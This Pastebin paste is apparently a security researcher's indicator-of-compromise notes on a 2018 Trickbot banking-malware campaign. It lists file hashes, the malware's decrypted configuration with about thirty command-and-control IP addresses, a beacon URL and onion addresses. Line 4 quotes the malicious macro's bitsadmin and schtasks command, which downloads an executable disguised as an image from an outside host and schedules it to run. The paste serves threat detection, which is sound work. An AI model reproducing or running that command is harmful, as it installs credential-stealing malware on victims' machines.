API tools faq
paste
secresearcher

Trickbot version 1000245 : group_tag : 0813

secresearcher
Aug 13th, 2018
201
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.93 KB | None | 0 0
raw download clone embed print report
  1. #trickbot "Critical Notice: Statement of Liabilities" shared by Racoo
  2.  
  3. Macro enabled doc Statement.doc > https://beta.virusbay.io/sample/browse/6f07f7104add44b4ef8393e99ecda633
  4. runs : cmd.exe /c bitsadmin /transfer msd5 /priority foreground http://onyx-tools.com/public.png %TEMP%/cCTypiwOC.exe &schtasks /create /st 14:49 /sc once /tn srx3 /tr %TEMP%/cCTypiwOC.exe
  5.  
  6. Drops : public.png : 00e5e57d672145f33b866b37ec714c0078f3ad2e9e9eab6f284df2af7784d4bf
  7. https://app.any.run/tasks/c9b085d8-7747-4e6a-b2eb-49a0cfff7798
  8.  
  9. Installation dir > Roaming\vcmsd
  10.  
  11. Modules
  12. 00e5e57d672145f33b866b37ec714c0078f3ad2e9e9eab6f284df2af7784d4bf ./cDTypiwOD.exe
  13. f0eee12966ca8156ef9483304b6a018e0130e414fe83242e02e7c79526907c36 ./info.dat
  14. bbb018456a06339dd74c8c1bdc90ad880af731bcefa152584340b2e4fd8c9b8d ./FAQ
  15. 38955b875a8d00cce78dcf823ed35091fb6f07e5bf3c3638e9abf1feadf5fe18 ./README.md
  16. 2bab8ba30719a42213db0087572e481f14de7cdf7bffe1a1be17db9f09d70525 ./Modules/networkDll32
  17. 70dccaa8296d3101e33f952eb2a927a21f428786f1f8db724eaf918408e348cf ./Modules/systeminfo32
  18. 18c9e21685ab93786ffe5d2046526419057ee315551695186caedfc1189d25b5 ./Modules/injectDll32
  19. 3a6b6777fef3a63f5d140be36abe76d28eb3251ecd6da1a50eb9d4c92e64aad4 ./Modules/networkDll32_configs/dpost
  20. c84da3e052b1d0efd8d1bfbde2c48d05bbe6ad5435fd12b7749ca724a9a11439 ./Modules/injectDll32_configs/dinj
  21. edb17b2f4e39f45022597a80b3d9f8e64283d8e6103ed80973f243903a9502ef ./Modules/injectDll32_configs/sinj
  22. 3a6b6777fef3a63f5d140be36abe76d28eb3251ecd6da1a50eb9d4c92e64aad4 ./Modules/injectDll32_configs/dpost
  23.  
  24. <mcconf>
  25. <ver>1000245</ver>
  26. <gtag>ser0813</gtag>
  27. <servs><srv>185.106.162.4:443</srv>
  28. <srv>85.9.212.117:443</srv>
  29. <srv>82.164.118.12:443</srv>
  30. <srv>198.53.63.120:443</srv>
  31. <srv>158.58.131.54:443</srv>
  32. <srv>185.106.162.9:449</srv>
  33. <srv>118.200.151.113:443</srv>
  34. <srv>36.67.215.93:449</srv>
  35. <srv>41.211.9.234:449</srv>
  36. <srv>178.78.202.189:443</srv>
  37. <srv>185.106.162.89:449</srv>
  38. <srv>212.225.214.249:449</srv>
  39. <srv>68.169.161.5:443</srv>
  40. <srv>148.66.40.98:443</srv>
  41. <srv>103.205.112.58:443</srv>
  42. <srv>182.253.210.130:449</srv>
  43. <srv>47.49.168.50:443</srv>
  44. <srv>70.79.178.120:449</srv>
  45. <srv>68.109.83.22:443</srv>
  46. <srv>176.10.170.65:443</srv>
  47. <srv>84.237.228.13:443</srv>
  48. <srv>96.43.40.221:443</srv>
  49. <srv>195.133.145.121:443</srv>
  50. <srv>92.53.67.154:443</srv>
  51. <srv>91.235.128.139:443</srv>
  52. <srv>109.234.39.194:443</srv>
  53. <srv>83.220.168.185:443</srv>
  54. <srv>37.230.116.52:443</srv>
  55. <srv>78.155.207.102:443</srv></servs>
  56. <autorun>
  57. <module name="systeminfo" ctl="GetSystemInfo"/>
  58. <module name="injectDll"/>
  59. </autorun>
  60. </mcconf>
  61.  
  62.  
  63. POST
  64. https://109.234.38.201:447/ser0813/USERNAME-PC_W617601.3D5D4D47640CB0626DF2AA7B550228C5/5/systeminfo32/
  65.  
  66.  
  67. 0x287b1c, 88, <ssert>
  68. <expir>1546214400</expir>
  69. </ssert>
  70. 3gihg5esw7lxg2wh.onion:448
  71. 185.251.39.124:447:447
  72. 46.21.248.207:447
  73. 109.234.38.201:447 185.251.38.104:447
  74. 95.213.204.86:447
  75. gihg5esw7lxg2wh.onion:448
  76. cgihg5esw7lxg2wh.onion:448
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!